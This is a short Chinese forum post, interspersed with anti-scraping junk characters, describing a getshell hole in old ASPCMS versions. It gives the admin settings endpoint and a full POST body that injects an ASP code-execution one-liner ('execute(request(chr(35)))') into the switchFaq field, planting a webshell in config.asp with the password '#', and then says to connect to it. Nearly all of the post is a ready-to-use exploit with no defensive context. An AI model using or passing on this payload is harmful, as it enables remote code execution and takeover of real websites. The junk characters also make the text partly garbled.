老的ASPCMS版本的秒杀拿SHELL漏洞& ^. H/ }4 k6 m. b( ^9 \
2 w8 \1 m5 w: O, R 找到后台。。。然后0 d. [( P1 e2 q7 h- X5 F8 `1 s
; I# J! N2 O; e& x3 t, F
/admin/_system/AspCms_SiteSetting.asp?action=saves# ^* q) U$ H/ L, M4 ~$ X( f5 h
5 w, l2 M8 a5 I
直接POST
2 c0 W5 ~# ^( b1 \ $ Q5 ^8 H4 @, O1 M) E8 N* d
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
9 J3 q2 L, q0 w( q' e* x
- @: l2 b) c# r( R' i5 P) ^0 z再连接配置文件config.asp 密码为#
# y2 f. v$ x( s' ? |